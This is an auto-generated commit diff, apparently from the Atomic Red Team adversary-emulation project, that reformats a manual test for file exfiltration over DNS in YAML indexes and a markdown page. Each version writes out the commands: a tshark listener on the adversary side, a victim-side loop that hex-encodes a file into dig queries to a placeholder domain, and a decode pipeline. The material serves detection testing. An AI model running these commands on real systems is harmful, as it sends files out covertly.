Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/index.yaml

@@ -117632,14 +117632,18 @@ exfiltration:
       supported_platforms:
       - linux
       executor:
-        steps: "1. On the adversary machine run the below command.\n\n    tshark -f
-          \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name
-          matches \".domain\"\" >> received_data.txt\n\n2. On the victim machine run
-          the below commands.\n\n    xxd -p input_file > encoded_data.hex | for data
-          in `cat encoded_data.hex`; do dig $data.domain; done\n    \n3. Once the
-          data is received, use the below command to recover the data.\n\n    cat
-          output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1
-          | sort | uniq | xxd -p -r\n"
+        steps: |
+          1. On the adversary machine run the below command.
+
+              tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \\".domain\\"" >> received_data.txt
+
+          2. On the victim machine run the below commands.
+
+              xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
+
+          3. Once the data is received, use the below command to recover the data.
+
+              cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
         name: manual
     - name: Exfiltration Over Alternative Protocol - HTTP
       auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c

atomics/Indexes/linux-index.yaml

@@ -73666,14 +73666,18 @@ exfiltration:
       supported_platforms:
       - linux
       executor:
-        steps: "1. On the adversary machine run the below command.\n\n    tshark -f
-          \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name
-          matches \".domain\"\" >> received_data.txt\n\n2. On the victim machine run
-          the below commands.\n\n    xxd -p input_file > encoded_data.hex | for data
-          in `cat encoded_data.hex`; do dig $data.domain; done\n    \n3. Once the
-          data is received, use the below command to recover the data.\n\n    cat
-          output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1
-          | sort | uniq | xxd -p -r\n"
+        steps: |
+          1. On the adversary machine run the below command.
+
+              tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \\".domain\\"" >> received_data.txt
+
+          2. On the victim machine run the below commands.
+
+              xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
+
+          3. Once the data is received, use the below command to recover the data.
+
+              cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
         name: manual
     - name: Python3 http.server
       auto_generated_guid: 3ea1f938-f80a-4305-9aa8-431bc4867313

atomics/T1048.003/T1048.003.md

@@ -114,12 +114,12 @@ Exfiltration of specified file over DNS protocol.
 #### Run it with these steps! 
 1. On the adversary machine run the below command.
 
-    tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
+    tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \\".domain\\"" >> received_data.txt
 
 2. On the victim machine run the below commands.
 
     xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
-    
+
 3. Once the data is received, use the below command to recover the data.
 
     cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r